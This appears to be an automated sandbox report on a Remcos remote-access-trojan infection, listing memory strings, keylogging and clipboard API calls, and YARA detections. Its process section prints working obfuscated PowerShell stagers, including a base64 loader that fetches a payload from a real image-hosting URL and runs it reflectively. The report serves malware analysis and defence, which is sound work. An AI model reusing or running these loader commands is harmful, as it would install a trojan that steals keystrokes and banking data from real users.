Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485897465.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.2233063416.00000000070B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://akaStorageSetting.cdxml
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dahall/taskscheduler
Source: powershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2232999397.0000000007060000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/WindowsErrorReporting/icrosoft.WindowsErrorRe
Source: powershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49770 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BB77 SystemParametersInfoW

System Summary

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02E17638
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02E1B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041D071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004520D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043D098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00437150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004361AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00426254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00431377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041E5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0044C739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004267CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043C9DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00432A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043CC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00434D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00426E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00440E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043CE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00452F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00426FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004020E7 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004338A5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00433FB0 appears 55 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe | Process created: Commandline size = 2059
Source: C:\Windows\SysWOW64\cmd.exe | Process created: Commandline size = 2026
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@5/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seewhatiamdoingforyouwithgreatnessthingsgivenmeback[1].tiff
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-H22KKM
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:948:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2edxtcbw.wk3.ps1
